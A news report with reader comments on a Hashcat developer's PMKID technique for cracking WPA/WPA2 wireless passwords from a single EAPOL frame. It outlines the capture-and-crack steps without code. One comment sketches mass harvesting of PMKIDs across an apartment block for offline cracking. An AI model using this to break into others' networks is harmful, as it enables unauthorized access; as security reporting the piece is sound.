Hashcat Developer Discovers Simpler Way To Crack WPA2 Wireless Passwords

New submitter Woodmeister shares a report: While looking for ways to attack the new WPA3 security standard, Hashcat developer Jens "Atom" Steube found a simpler way to capture and crack access credentials protecting WPA and WPA2 wireless networks. The attacker needs to capture a single EAPOL frame after requesting it from the access point, extract the PMKID from it by dumping the recieved frame to a file, convert the captured data to a hash format accepted by Hashcat, and run Hashcat to crack it. Once that's done, the attacker has the Pre-Shared Key (PSK), i.e. the password, of the wireless network. Depending on the length and complexity of the password and the power of the cracking rig, that last step could take hours or days. "The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame," Steube explained. This makes the attack much easier to pull off, as the attacker doesn't depend on another user and on being in range of both the user and the access point at the exact moment when the user connects to the wireless network and the handshake takes place.

Use good passwords

[dlakelan]

A good password for wifi, since it doesn't really need to be memorized, is one generated by something like keepass2: 15 characters long random letters numbers and punctuation:

DHDukBDL04Pt2ZT

for example (note that is not a password I use, just one I randomly generated).

Since no-one actually has to type this in more than once per device, it's really not a major problem that you can't memorize it.

Re:Use good passwords

I sniff those too. Easy enough to spoof. Sometimes I have to wait for the impersonated device to be offline. Depends on the AP and the device.

Re:Use good passwords

[skoskav]

You clearly never have guests over.

Re: Use good passwords

[c6gunner]

That's what a guest network is for. Enable it when they show up, disable it when they go away.

Re:Use good passwords

[hawguy]

A good password for wifi, since it doesn't really need to be memorized, is one generated by something like keepass2: 15 characters long random letters numbers and punctuation:

DHDukBDL04Pt2ZT

for example (note that is not a password I use, just one I randomly generated).

Since no-one actually has to type this in more than once per device, it's really not a major problem that you can't memorize it.

It may not need to be memorized, but it does need to be typed into every Wifi device you own, sometimes through a clunky on screen or "scroll through the letters" LCD interface. So random string passwords are annoying enough that many people avoid them.

Re: Use good passwords

might as well use ethernet, or tin cans with a string...

R O

Re:Bypassing login password by booting a different

You don't seem to understand this attack at all. It makes it possible to precompute the password to a WPA2-PSK network without having to wait for a valid client to authenticate against the network in the first place.

So you can just walk around an apartment block with your phone asking each AP for the needed packet. Go back home, crack it all offline and come back doing automated attacks on every network. Each visit takes a few minutes each time instead of having to wait for a valid authorized client for each network. Can be dronified of course for extra flare.

This breaks WPA2-PSK by making attacks trivial to do. I wonder how the Enterprise versions hold up.